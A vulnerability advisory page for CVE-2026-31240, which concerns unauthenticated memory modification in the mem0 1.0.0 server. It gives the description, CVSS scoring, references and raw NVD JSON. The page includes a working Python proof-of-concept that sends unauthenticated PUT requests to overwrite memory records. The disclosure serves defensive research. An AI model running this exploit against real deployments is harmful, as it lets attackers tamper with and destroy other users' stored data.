CVE-2026-31240

Description

The mem0 1.0.0 server lacks authentication and authorization controls for its memory management API endpoints. Critical functions such as updating memory records (PUT /memories/{memory_id}) are exposed without any verification of the requester's identity or permissions. A remote attacker can exploit this by sending unauthenticated requests to modify, overwrite, or delete arbitrary memory records, leading to unauthorized data manipulation and potential data loss.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

mem0 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_mem0(target_url, memory_id, new_data):
    """
    Exploit for CVE-2026-31240: Unauthenticated memory modification in mem0.
    """
    # Target endpoint to update memory
    endpoint = f"{target_url}/memories/{memory_id}"
    
    headers = {
        "Content-Type": "application/json"
    }
    
    # Payload containing the malicious data
    payload = {
        "text": new_data,
        "metadata": {"modified_by": "attacker"}
    }
    
    try:
        # Sending unauthenticated PUT request
        response = requests.put(endpoint, json=payload, headers=headers)
        
        if response.status_code == 200:
            print(f"[+] Successfully modified memory record {memory_id}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to modify record. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://localhost:8000" # Replace with actual target
    mem_id = "victim_memory_id_here"
    malicious_content = "This data has been overwritten by an attacker."
    exploit_mem0(target, mem_id, malicious_content)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31240
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31240
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31240/
[4] VulDB https://vuldb.com/cve/CVE-2026-31240
[5] https://github.com/mem0ai/mem0
[6] https://www.notion.so/CVE-2026-31240-35d1e13931888170964ae035c04a8f18

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31240", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:52.443", "lastModified": "2026-05-14T20:17:03.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mem0 1.0.0 server lacks authentication and authorization controls for its memory management API endpoints. Critical functions such as updating memory records (PUT /memories/{memory_id}) are exposed without any verification of the requester's identity or permissions. A remote attacker can exploit this by sending unauthenticated requests to modify, overwrite, or delete arbitrary memory records, leading to unauthorized data manipulation and potential data loss."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/mem0ai/mem0", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31240-35d1e13931888170964ae035c04a8f18", "source": "[email protected]"}]}}